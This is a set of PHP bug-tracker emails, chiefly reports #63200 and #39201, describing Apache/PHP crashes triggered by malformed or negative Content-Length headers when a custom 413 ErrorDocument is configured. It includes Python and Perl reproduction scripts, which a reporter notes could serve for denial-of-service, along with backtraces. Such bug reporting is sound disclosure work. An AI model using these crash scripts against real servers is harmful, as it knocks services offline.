Bug #63200 [Com]: Apache 2.2 crashes when PHP called with negative Content-Length HTTP header
Edit report at https://bugs.php.net/bug.php?id=63200&edit=1 ID: 63200 Comment by: thomas at partyflock dot nl Reported by:chris at whyley dot com Summary:Apache 2.2 crashes when PHP called with negative Content-Length HTTP header Status: Open Type: Bug Package:Reproducible crash Operating System: Windows Server 2003 PHP Version:5.3.17 Block user comment: N Private report: N New Comment: I had this in 5.4.4 on my production servers but not on an identical test server, which runs on a local domain but uses the same (version) php, apache and modules. The test server always returns a normal 200 page on the test server though, don't ask me why. Removing the custom ErrorDocument indeed solves the problem. Previous Comments: [2013-02-18 11:08:42] chris at whyley dot com Re-opening this bug as it still exists in the 5.3 stream. [2013-02-18 00:36:03] php-bugs at lists dot php dot net No feedback was provided. The bug is being suspended because we assume that you are no longer experiencing the problem. If this is not the case and you are able to provide the information that was requested earlier, please do so and change the status of the bug back to "Open". Thank you. [2012-10-05 10:26:01] chris at whyley dot com I have not tested this issue under version 5.4 as my environment is setup for 5.3.17 - Are you able to recreate in 5.3.17 ? It always crashes no matter what I have in index.php - in fact I can call any page and cause the crash to happen. [2012-10-05 04:26:26] larue...@php.net I can not reproduce this with 5.4, and from the backtrace, it seems crash in another place. so, is it related with your index.php? does it always crash no matter what the index.php is? [2012-10-02 14:45:02] chris at whyley dot com Description: Apache 2.2 with PHP 5.3.17 on Windows Server 2003 can be made to repeatably crash by doing the following: (1) Configure your Apache server to use a custom error handling page for the HTTP 413 error (Request entity too large) by inserting this line into your httpd.conf: ErrorDocument 413 /error/ (2) Run the Python test script detailed below to send an HTTP GET request to the server with a negative integer for the HTTP "Content-Length" header and with the "Accept-Encoding" header set to "gzip, deflate" When this is run, Apache crashes with the following error: [Tue Oct 02 13:46:16 2012] [error] [client 10.211.55.3] Invalid Content-Length [Tue Oct 02 13:46:22 2012] [notice] Parent: child process exited with status 3221225477 -- Restarting. This issue is a particular problem in the wild where many modern browsers aren't capable of handling file uploads over 2GB in size - instead of posting an accurate filesize for the Content-Length header they use a negative integer instead, causing the Apache server running PHP to crash. For further information on this see http://www.motobit.com/help/scptutl/pa98.htm The script could be used to perform DOS attacks on vulnerable systems. Test script: --- #!/usr/bin/python import socket, sys target = "10.211.55.3" port = 80; request = "GET / HTTP/1.1\n" request += "Host: "+target+"\n" request += "Accept-Encoding:gzip, deflate\n" request += "Content-Length: -1\n\n" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((target, port)) except: print "[-] Connection to %s:%s failed!" % (target, port) sys.exit(0) print "[+] Sending HTTP request. Check for crash on target." s.send(request) s.close() Expected result: Stable Apache, no crash. Actual result: -- Thread 2 - System ID 3008 Entry point msvcrt!_endthreadex+3a Create time 10/2/2012 2:29:08 PM Time spent in user mode 0 Days 0:0:0.0 Time spent in kernel mode 0 Days 0:0:0.15 Full Call Stack Function Arg 1 Arg 2 Arg 3 Arg 4 Source php5ts!zend_hash_index_find+17 016f3460 000d 018ee6c0 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_hash.c @ 985 php5ts!_zend_list_delete+27 000d 016b0150 029811c0 016b0150 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_list.c @ 55 + 27 php5ts!_php_stream_free+ae 029811c0 0003 016b0150 029811c0 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\streams\streams.c @ 399 + a php5ts!php_zend_stream_mmap_closer+1a 029811c0
Bug #55691 [Com]: different results from finfo_file and finfo_buffer
Edit report at https://bugs.php.net/bug.php?id=55691&edit=1 ID: 55691 Comment by: thomas at partyflock dot nl Reported by:di_herbert dot huber at yahoo dot com Summary:different results from finfo_file and finfo_buffer Status: Open Type: Bug Package:Unknown/Other Function Operating System: WinXP HE SP2 PHP Version:5.3.8 Block user comment: N Private report: N New Comment: Happens to me too, and I experience this for an xls/Excel document too. Previous Comments: [2011-09-14 09:35:36] di_herbert dot huber at yahoo dot com Description: different results from finfo_file and finfo_buffer Scenario: 1. MS Excel-File stored in mySQL database LONGBLOB-Column 2. This binary data selected from database 3. This binary data stored to tempfile 4. mime-type sniffing done by finfo_buffer on binary data > result: application/octet-stream 5. mime-type sniffing done by finfo_file on tempfile > result: application/vnd.ms-excel PROBLEM: different result, dependent on used Fileinfo Function Comment: The tempfile has NO extension like ".xls" that could be used as hint for mimetype-sniffing Test script: --- https://bugs.php.net/bug.php?id=55691&edit=1
#43540 [NEW]: rfc1867 handler newlength problem
From: thomas at partyflock dot nl Operating system: Linux PHP version: 5.2.5 PHP Bug Type: Unknown/Other Function Bug description: rfc1867 handler newlength problem Description: In main/rfc1867.c, line 928, newlength is initialized to 0. Shouldn't this be new_val_len? Currently if your form handler does nothing and always returns SUCCESS, all the viables get set, but with 0 length strings. -- Edit bug report at http://bugs.php.net/?id=43540&edit=1 -- Try a CVS snapshot (PHP 4.4): http://bugs.php.net/fix.php?id=43540&r=trysnapshot44 Try a CVS snapshot (PHP 5.2): http://bugs.php.net/fix.php?id=43540&r=trysnapshot52 Try a CVS snapshot (PHP 5.3): http://bugs.php.net/fix.php?id=43540&r=trysnapshot53 Try a CVS snapshot (PHP 6.0): http://bugs.php.net/fix.php?id=43540&r=trysnapshot60 Fixed in CVS: http://bugs.php.net/fix.php?id=43540&r=fixedcvs Fixed in release: http://bugs.php.net/fix.php?id=43540&r=alreadyfixed Need backtrace: http://bugs.php.net/fix.php?id=43540&r=needtrace Need Reproduce Script:http://bugs.php.net/fix.php?id=43540&r=needscript Try newer version:http://bugs.php.net/fix.php?id=43540&r=oldversion Not developer issue: http://bugs.php.net/fix.php?id=43540&r=support Expected behavior:http://bugs.php.net/fix.php?id=43540&r=notwrong Not enough info: http://bugs.php.net/fix.php?id=43540&r=notenoughinfo Submitted twice: http://bugs.php.net/fix.php?id=43540&r=submittedtwice register_globals: http://bugs.php.net/fix.php?id=43540&r=globals PHP 3 support discontinued: http://bugs.php.net/fix.php?id=43540&r=php3 Daylight Savings: http://bugs.php.net/fix.php?id=43540&r=dst IIS Stability:http://bugs.php.net/fix.php?id=43540&r=isapi Install GNU Sed: http://bugs.php.net/fix.php?id=43540&r=gnused Floating point limitations: http://bugs.php.net/fix.php?id=43540&r=float No Zend Extensions: http://bugs.php.net/fix.php?id=43540&r=nozend MySQL Configuration Error:http://bugs.php.net/fix.php?id=43540&r=mysqlcfg
#39201 [Asn]: POST with invalid content-length and ErrorDocument set crashes php
ID: 39201 User updated by: thomas at partyflock dot nl Reported By: thomas at partyflock dot nl Status: Assigned Bug Type: Apache2 related -Operating System: Linux (2.6.18) +Operating System: Linux (2.6.18.1) -PHP Version: 5.1.6 +PHP Version: 5.2.0 Assigned To: tony2001 New Comment: Upped version to 5.2.0, happens there too. Previous Comments: [2006-11-03 13:39:56] thomas at partyflock dot nl Found out another thing. If I point ErrorDocument 413 to a static page, there is no segmentation fault, but then the static page is displayed AND the PHP script as requested by the POST command. So ErrorDocument 413 /something.html And doing following POST with Content-Length with invalid extra carriage return: POST /somescript.php HTTP/1.0 Content-Length: 1\r Doesn't crash, but does exhibit strange behavouir by displaying the error document appended with the somescript.php! [2006-10-21 23:22:39] judas dot iscariote at gmail dot com Unable to reproduce it here ... [2006-10-20 01:04:01] thomas at partyflock dot nl Program received signal SIGSEGV, Segmentation fault. [Switching to Thread -1211164992 (LWP 15723)] 0xb7b4e7e0 in sapi_read_standard_form_data () at /root/build/webserver/200610181 225 SG(request_info).post_data[SG(read_post_bytes)] = 0; /* termina (gdb) bt #0 0xb7b4e7e0 in sapi_read_standard_form_data () at /root/build/webserver/20061 #1 0xb7b53425 in php_default_post_reader () at /root/build/webserver/2006101814 #2 0xb7b4ee57 in sapi_activate () at /root/build/webserver/200610181402/php/php #3 0xb7b471ac in php_request_startup () at /root/build/webserver/200610181402/p #4 0xb7c0ed45 in php_apache_request_ctor (r=0x81d10e0, ctx=0x81d23e8) at /root/build/webserver/200610181402/php/php-5.2/sapi/apache2handler/sapi_a #5 0xb7c0f26f in php_handler (r=0x81d10e0) at /root/build/webserver/20061018140 #6 0x0807a514 in ap_invoke_handler () #7 0x0806bb02 in ap_process_request () #8 0x08065a92 in ap_process_http_connection () #9 0x0808389b in ap_process_connection () #10 0x08077a06 in child_main () #11 0x08077cd6 in make_child () #12 0x08078034 in ap_mpm_run () #13 0x0807e970 in main () (gdb) p sapi_globals.request_info $2 = {request_method = 0x81d2910 "GET", query_string = 0x81d69b8 "SECTION=anything;sELEMENT=anything;EXTENSION=", post_data = 0x0, raw_post_data = 0x0, cookie_data = 0x0, content_length = 1, post_data_length = 0, raw_post_data_length = 0, path_translated = 0x81d69f8 "/home/party/public_html/index.php", request_uri = 0x81d69e8 "/anything", content_type = 0x0, headers_only = 0 '\0', no_headers = 0 '\0', headers_read = 0 '\0', post_entry = 0x0, content_type_dup = 0x0, auth_user = 0x0, auth_password = 0x0, auth_digest = 0x0, argv0 = 0x0, current_user = 0x0, current_user_length = 0, argc = 0, argv = 0x0, proto_num = 1000} But I've narrowed it down a bit. It requires the following lines in httpd.conf: RewriteEngine on RewriteRule ^/anywhere$ /somewherelse.php ErrorDocument 413 /anywhere /somewherelse.php must exists. There's no problem if a non-php file is used. [2006-10-19 22:48:13] [EMAIL PROTECTED] Thank you for this bug report. To properly diagnose the problem, we need a backtrace to see what is happening behind the scenes. To find out how to generate a backtrace, please read http://bugs.php.net/bugs-generating-backtrace.php for *NIX and http://bugs.php.net/bugs-generating-backtrace-win32.php for Win32 Once you have generated a backtrace, please submit it to this bug report and change the status back to "Open". Thank you for helping us make PHP better. Can't reproduce. This is the only result I see: [Fri Oct 20 02:46:09 2006] [error] [client 127.0.0.1] Invalid Content-Length ---------------- [2006-10-19 21:46:32] thomas at partyflock dot nl Happens in 5.2dev too. The remainder of the comments for this report are too long. To view the rest of the comments, please view the bug report online at http://bugs.php.net/39201 -- Edit this bug report at http://bugs.php.net/?id=39201&edit=1
#39201 [Asn]: POST with invalid content-length and ErrorDocument set crashes php
ID: 39201 User updated by: thomas at partyflock dot nl Reported By: thomas at partyflock dot nl Status: Assigned Bug Type: Apache2 related Operating System: Linux (2.6.18) PHP Version: 5.1.6 Assigned To: tony2001 New Comment: Found out another thing. If I point ErrorDocument 413 to a static page, there is no segmentation fault, but then the static page is displayed AND the PHP script as requested by the POST command. So ErrorDocument 413 /something.html And doing following POST with Content-Length with invalid extra carriage return: POST /somescript.php HTTP/1.0 Content-Length: 1\r Doesn't crash, but does exhibit strange behavouir by displaying the error document appended with the somescript.php! Previous Comments: [2006-10-21 23:22:39] judas dot iscariote at gmail dot com Unable to reproduce it here ... [2006-10-20 01:04:01] thomas at partyflock dot nl Program received signal SIGSEGV, Segmentation fault. [Switching to Thread -1211164992 (LWP 15723)] 0xb7b4e7e0 in sapi_read_standard_form_data () at /root/build/webserver/200610181 225 SG(request_info).post_data[SG(read_post_bytes)] = 0; /* termina (gdb) bt #0 0xb7b4e7e0 in sapi_read_standard_form_data () at /root/build/webserver/20061 #1 0xb7b53425 in php_default_post_reader () at /root/build/webserver/2006101814 #2 0xb7b4ee57 in sapi_activate () at /root/build/webserver/200610181402/php/php #3 0xb7b471ac in php_request_startup () at /root/build/webserver/200610181402/p #4 0xb7c0ed45 in php_apache_request_ctor (r=0x81d10e0, ctx=0x81d23e8) at /root/build/webserver/200610181402/php/php-5.2/sapi/apache2handler/sapi_a #5 0xb7c0f26f in php_handler (r=0x81d10e0) at /root/build/webserver/20061018140 #6 0x0807a514 in ap_invoke_handler () #7 0x0806bb02 in ap_process_request () #8 0x08065a92 in ap_process_http_connection () #9 0x0808389b in ap_process_connection () #10 0x08077a06 in child_main () #11 0x08077cd6 in make_child () #12 0x08078034 in ap_mpm_run () #13 0x0807e970 in main () (gdb) p sapi_globals.request_info $2 = {request_method = 0x81d2910 "GET", query_string = 0x81d69b8 "SECTION=anything;sELEMENT=anything;EXTENSION=", post_data = 0x0, raw_post_data = 0x0, cookie_data = 0x0, content_length = 1, post_data_length = 0, raw_post_data_length = 0, path_translated = 0x81d69f8 "/home/party/public_html/index.php", request_uri = 0x81d69e8 "/anything", content_type = 0x0, headers_only = 0 '\0', no_headers = 0 '\0', headers_read = 0 '\0', post_entry = 0x0, content_type_dup = 0x0, auth_user = 0x0, auth_password = 0x0, auth_digest = 0x0, argv0 = 0x0, current_user = 0x0, current_user_length = 0, argc = 0, argv = 0x0, proto_num = 1000} But I've narrowed it down a bit. It requires the following lines in httpd.conf: RewriteEngine on RewriteRule ^/anywhere$ /somewherelse.php ErrorDocument 413 /anywhere /somewherelse.php must exists. There's no problem if a non-php file is used. [2006-10-19 22:48:13] [EMAIL PROTECTED] Thank you for this bug report. To properly diagnose the problem, we need a backtrace to see what is happening behind the scenes. To find out how to generate a backtrace, please read http://bugs.php.net/bugs-generating-backtrace.php for *NIX and http://bugs.php.net/bugs-generating-backtrace-win32.php for Win32 Once you have generated a backtrace, please submit it to this bug report and change the status back to "Open". Thank you for helping us make PHP better. Can't reproduce. This is the only result I see: [Fri Oct 20 02:46:09 2006] [error] [client 127.0.0.1] Invalid Content-Length ---------------- [2006-10-19 21:46:32] thomas at partyflock dot nl Happens in 5.2dev too. [2006-10-19 20:16:29] [EMAIL PROTECTED] Please try using this CVS snapshot: http://snaps.php.net/php5.2-latest.tar.gz For Windows: http://snaps.php.net/win32/php5.2-win32-latest.zip The remainder of the comments for this report are too long. To view the rest of the comments, please view the bug report online at http://bugs.php.net/39201 -- Edit this bug report at http://bugs.php.net/?id=39201&edit=1
#39201 [Fbk->Opn]: POST with invalid content-length and ErrorDocument set crashes php
ID: 39201 User updated by: thomas at partyflock dot nl Reported By: thomas at partyflock dot nl -Status: Feedback +Status: Open Bug Type: Apache2 related Operating System: Linux (2.6.18) PHP Version: 5.1.6 New Comment: Program received signal SIGSEGV, Segmentation fault. [Switching to Thread -1211164992 (LWP 15723)] 0xb7b4e7e0 in sapi_read_standard_form_data () at /root/build/webserver/200610181 225 SG(request_info).post_data[SG(read_post_bytes)] = 0; /* termina (gdb) bt #0 0xb7b4e7e0 in sapi_read_standard_form_data () at /root/build/webserver/20061 #1 0xb7b53425 in php_default_post_reader () at /root/build/webserver/2006101814 #2 0xb7b4ee57 in sapi_activate () at /root/build/webserver/200610181402/php/php #3 0xb7b471ac in php_request_startup () at /root/build/webserver/200610181402/p #4 0xb7c0ed45 in php_apache_request_ctor (r=0x81d10e0, ctx=0x81d23e8) at /root/build/webserver/200610181402/php/php-5.2/sapi/apache2handler/sapi_a #5 0xb7c0f26f in php_handler (r=0x81d10e0) at /root/build/webserver/20061018140 #6 0x0807a514 in ap_invoke_handler () #7 0x0806bb02 in ap_process_request () #8 0x08065a92 in ap_process_http_connection () #9 0x0808389b in ap_process_connection () #10 0x08077a06 in child_main () #11 0x08077cd6 in make_child () #12 0x08078034 in ap_mpm_run () #13 0x0807e970 in main () (gdb) p sapi_globals.request_info $2 = {request_method = 0x81d2910 "GET", query_string = 0x81d69b8 "SECTION=anything;sELEMENT=anything;EXTENSION=", post_data = 0x0, raw_post_data = 0x0, cookie_data = 0x0, content_length = 1, post_data_length = 0, raw_post_data_length = 0, path_translated = 0x81d69f8 "/home/party/public_html/index.php", request_uri = 0x81d69e8 "/anything", content_type = 0x0, headers_only = 0 '\0', no_headers = 0 '\0', headers_read = 0 '\0', post_entry = 0x0, content_type_dup = 0x0, auth_user = 0x0, auth_password = 0x0, auth_digest = 0x0, argv0 = 0x0, current_user = 0x0, current_user_length = 0, argc = 0, argv = 0x0, proto_num = 1000} But I've narrowed it down a bit. It requires the following lines in httpd.conf: RewriteEngine on RewriteRule ^/anywhere$ /somewherelse.php ErrorDocument 413 /anywhere /somewherelse.php must exists. There's no problem if a non-php file is used. Previous Comments: [2006-10-19 22:48:13] [EMAIL PROTECTED] Thank you for this bug report. To properly diagnose the problem, we need a backtrace to see what is happening behind the scenes. To find out how to generate a backtrace, please read http://bugs.php.net/bugs-generating-backtrace.php for *NIX and http://bugs.php.net/bugs-generating-backtrace-win32.php for Win32 Once you have generated a backtrace, please submit it to this bug report and change the status back to "Open". Thank you for helping us make PHP better. Can't reproduce. This is the only result I see: [Fri Oct 20 02:46:09 2006] [error] [client 127.0.0.1] Invalid Content-Length ---------------- [2006-10-19 21:46:32] thomas at partyflock dot nl Happens in 5.2dev too. [2006-10-19 20:16:29] [EMAIL PROTECTED] Please try using this CVS snapshot: http://snaps.php.net/php5.2-latest.tar.gz For Windows: http://snaps.php.net/win32/php5.2-win32-latest.zip ---------------- [2006-10-19 20:10:24] thomas at partyflock dot nl Description: Insert ErrorDocument directive for error code 413 in httpd.conf: ErrorDocument 413 /anywhere Now post something to your webserver, with following invalid Content-Length: 1\r\r\n (extra carriage return) sapi_globals.request_info.post_data is allocated, in SAPI.c:sapi_read_standard_form_data on line 203. After the call to sapi_module.read_post on line 206, the POST request is transformed to a GET request for above error document and the sapi_globals.request_info.post_data is 0 at that point, resulting in a segmentation fault at SAPI.c line 223. Reproduce code: --- #!/usr/bin/perl -w use strict; use IO::Socket; if ($#ARGV < 0) { print STDERR "need hostname argument\n"; exit 1; } my $sock = IO::Socket::INET->new( 'PeerAddr' => $ARGV[0], 'PeerPort' => 80 ); if (!$sock) { print STDERR "failed to connect to port 80 of $ARGV[0]\n"; exit 1; } print $sock "POST / HTTP/1.0\r\n"; print $sock "Content-Length: 1\r\r\n\r\n"; print $sock "a"; undef $sock; Expected result: Well, I'd expect it to not crash :) -- Edit this bug report at http://bugs.php.net/?id=39201&edit=1
#39201 [Fbk->Opn]: POST with invalid content-length and ErrorDocument set crashes php
ID: 39201 User updated by: thomas at partyflock dot nl Reported By: thomas at partyflock dot nl -Status: Feedback +Status: Open Bug Type: Apache2 related Operating System: Linux (2.6.18) PHP Version: 5.1.6 New Comment: Happens in 5.2dev too. Previous Comments: [2006-10-19 20:16:29] [EMAIL PROTECTED] Please try using this CVS snapshot: http://snaps.php.net/php5.2-latest.tar.gz For Windows: http://snaps.php.net/win32/php5.2-win32-latest.zip [2006-10-19 20:10:24] thomas at partyflock dot nl Description: Insert ErrorDocument directive for error code 413 in httpd.conf: ErrorDocument 413 /anywhere Now post something to your webserver, with following invalid Content-Length: 1\r\r\n (extra carriage return) sapi_globals.request_info.post_data is allocated, in SAPI.c:sapi_read_standard_form_data on line 203. After the call to sapi_module.read_post on line 206, the POST request is transformed to a GET request for above error document and the sapi_globals.request_info.post_data is 0 at that point, resulting in a segmentation fault at SAPI.c line 223. Reproduce code: --- #!/usr/bin/perl -w use strict; use IO::Socket; if ($#ARGV < 0) { print STDERR "need hostname argument\n"; exit 1; } my $sock = IO::Socket::INET->new( 'PeerAddr' => $ARGV[0], 'PeerPort' => 80 ); if (!$sock) { print STDERR "failed to connect to port 80 of $ARGV[0]\n"; exit 1; } print $sock "POST / HTTP/1.0\r\n"; print $sock "Content-Length: 1\r\r\n\r\n"; print $sock "a"; undef $sock; Expected result: Well, I'd expect it to not crash :) -- Edit this bug report at http://bugs.php.net/?id=39201&edit=1
#39201 [NEW]: POST with invalid content-length and ErrorDocument set crashes php
From: thomas at partyflock dot nl Operating system: Linux (2.6.18) PHP version: 5.1.6 PHP Bug Type: Apache2 related Bug description: POST with invalid content-length and ErrorDocument set crashes php Description: Insert ErrorDocument directive for error code 413 in httpd.conf: ErrorDocument 413 /anywhere Now post something to your webserver, with following invalid Content-Length: 1\r\r\n (extra carriage return) sapi_globals.request_info.post_data is allocated, in SAPI.c:sapi_read_standard_form_data on line 203. After the call to sapi_module.read_post on line 206, the POST request is transformed to a GET request for above error document and the sapi_globals.request_info.post_data is 0 at that point, resulting in a segmentation fault at SAPI.c line 223. Reproduce code: --- #!/usr/bin/perl -w use strict; use IO::Socket; if ($#ARGV < 0) { print STDERR "need hostname argument\n"; exit 1; } my $sock = IO::Socket::INET->new( 'PeerAddr' => $ARGV[0], 'PeerPort' => 80 ); if (!$sock) { print STDERR "failed to connect to port 80 of $ARGV[0]\n"; exit 1; } print $sock "POST / HTTP/1.0\r\n"; print $sock "Content-Length: 1\r\r\n\r\n"; print $sock "a"; undef $sock; Expected result: Well, I'd expect it to not crash :) -- Edit bug report at http://bugs.php.net/?id=39201&edit=1 -- Try a CVS snapshot (PHP 4.4): http://bugs.php.net/fix.php?id=39201&r=trysnapshot44 Try a CVS snapshot (PHP 5.2): http://bugs.php.net/fix.php?id=39201&r=trysnapshot52 Try a CVS snapshot (PHP 6.0): http://bugs.php.net/fix.php?id=39201&r=trysnapshot60 Fixed in CVS: http://bugs.php.net/fix.php?id=39201&r=fixedcvs Fixed in release: http://bugs.php.net/fix.php?id=39201&r=alreadyfixed Need backtrace: http://bugs.php.net/fix.php?id=39201&r=needtrace Need Reproduce Script:http://bugs.php.net/fix.php?id=39201&r=needscript Try newer version:http://bugs.php.net/fix.php?id=39201&r=oldversion Not developer issue: http://bugs.php.net/fix.php?id=39201&r=support Expected behavior:http://bugs.php.net/fix.php?id=39201&r=notwrong Not enough info: http://bugs.php.net/fix.php?id=39201&r=notenoughinfo Submitted twice: http://bugs.php.net/fix.php?id=39201&r=submittedtwice register_globals: http://bugs.php.net/fix.php?id=39201&r=globals PHP 3 support discontinued: http://bugs.php.net/fix.php?id=39201&r=php3 Daylight Savings: http://bugs.php.net/fix.php?id=39201&r=dst IIS Stability:http://bugs.php.net/fix.php?id=39201&r=isapi Install GNU Sed: http://bugs.php.net/fix.php?id=39201&r=gnused Floating point limitations: http://bugs.php.net/fix.php?id=39201&r=float No Zend Extensions: http://bugs.php.net/fix.php?id=39201&r=nozend MySQL Configuration Error:http://bugs.php.net/fix.php?id=39201&r=mysqlcfg